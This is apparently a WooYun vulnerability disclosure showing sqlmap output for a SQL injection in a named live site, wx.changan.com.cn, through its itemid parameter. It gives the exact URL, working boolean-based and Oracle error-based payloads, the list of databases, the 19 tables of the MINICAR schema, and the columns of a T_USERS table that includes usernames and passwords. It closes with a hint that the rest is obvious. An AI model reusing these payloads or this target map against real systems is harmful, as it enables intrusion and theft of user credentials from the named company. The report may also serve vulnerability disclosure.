WooYun.org

注入点:http://wx.changan.com.cn/miccar_f202/index2.jsp?itemid=7
Place: GET
Parameter: itemid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: itemid=7 AND 1528=1528
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: itemid=7 AND 7147=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(107)|
|CHR(115)||CHR(118)||CHR(58)||(SELECT (CASE WHEN (7147=7147) THEN 1 ELSE 0 END)
FROM DUAL)||CHR(58)||CHR(109)||CHR(97)||CHR(115)||CHR(58)||CHR(62))) FROM DUAL)
web application technology: JSP
back-end DBMS: Oracle
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] MINICAR
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WJCACAR
current schema (equivalent to database on Oracle): 'MINICAR'
current user: 'MINICAR'
Database: MINICAR
[19 tables]
+-------------------+
| T_CAR |
| T_CARATT |
| T_CARATTTYPE |
| T_CARIMG |
| T_CONTENT |
| T_DEALER |
| T_GIFT |
| T_ITEM |
| T_MEMBER |
| T_MEMBERCAR |
| T_MEMBER_ARTICLE |
| T_MEMBER_GIFT |
| T_MEMBER_RECOMAND |
| T_MSG |
| T_RESERVE |
| T_RESERVE20101206 |
| T_USERS |
| T_VISITED_DETAIL |
| T_VISITED_NUM |
+-------------------+
Database: MINICAR
Table: T_USERS
[5 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| DEALER | VARCHAR2 |
| FUN | VARCHAR2 |
| PASSW | VARCHAR2 |
| USERID | VARCHAR2 |
| USERNAME | VARCHAR2 |
+----------+----------+
其他你懂的